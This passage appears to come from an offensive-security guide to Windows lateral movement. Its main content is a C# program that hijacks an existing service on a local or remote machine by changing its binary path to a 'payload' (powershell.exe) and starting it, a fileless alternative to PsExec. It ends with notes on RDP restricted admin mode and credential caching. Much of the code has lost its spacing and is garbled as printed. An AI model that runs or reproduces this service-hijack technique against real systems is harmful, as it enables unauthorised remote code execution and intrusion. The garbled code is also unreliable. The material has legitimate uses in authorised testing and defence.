We can do this in C# in a bit more elegant way, without having to copy a file & register a new service (instead we change to path of an existing one briefly).
usingSystem;usingSystem.Runtime.InteropServices;namespaceNetPsExec{classProgram { [DllImport("advapi32.dll", EntryPoint = "OpenSCManagerW", ExactSpelling = true, CharSet = CharSet.Unicode, SetLastError = true)]
publicstaticexternIntPtrOpenSCManager(string machineName,string databaseName,uint dwAccess); [DllImport("advapi32.dll", SetLastError =true, CharSet =CharSet.Auto)]staticexternIntPtrOpenService(IntPtr hSCManager,string lpServiceName,uint dwDesiredAccess); [DllImport("advapi32.dll", EntryPoint ="ChangeServiceConfig")] [return:MarshalAs(UnmanagedType.Bool)] public static extern bool ChangeServiceConfigA(IntPtr hService, uint dwServiceType, int dwStartType, int dwErrorControl, string lpBinaryPathName, string lpLoadOrderGroup, string lpdwTagId, string lpDependencies, string lpServiceStartName, string lpPassword,string lpDisplayName);
[DllImport("advapi32", SetLastError =true)] [return:MarshalAs(UnmanagedType.Bool)]publicstaticexternboolStartService(IntPtr hService,int dwNumServiceArgs,string[] lpServiceArgVectors);staticvoidMain(string[] args) {String target ="localhost"; // can be a remote computer nameIntPtr SCMHandle =OpenSCManager(target,null,0xF003F);string ServiceName ="SensorService"; // can be any service that is not in use and that we can startIntPtr schService =OpenService(SCMHandle, ServiceName,0xF01FF);string payload ="powershell.exe"; bool bResult = ChangeServiceConfigA(schService, 0xffffffff, 3, 0, payload, null, null, null, null, null, null);
bResult =StartService(schService,0,null); } }}
A more advanced Implementation can be found in SCShell which even has a python version and doe some additional steps (like restoring the original path).
RDP
This probably the easiest and most comfortable way. On Linux use xfreerdp for credssp.
On Windows we use mstsc.exe. When supplied the /restrictedadmin parameter, the current users Auth will be used without having to enter any creds (Network Logon, does not cache credentials). When supplying credentials, these will always be cached by windows - even after the rdp session has already ended. Restricted admin mode is disabled by default though (controlled by HKLM:\System\CurrentControlSet\Control\Lsa ).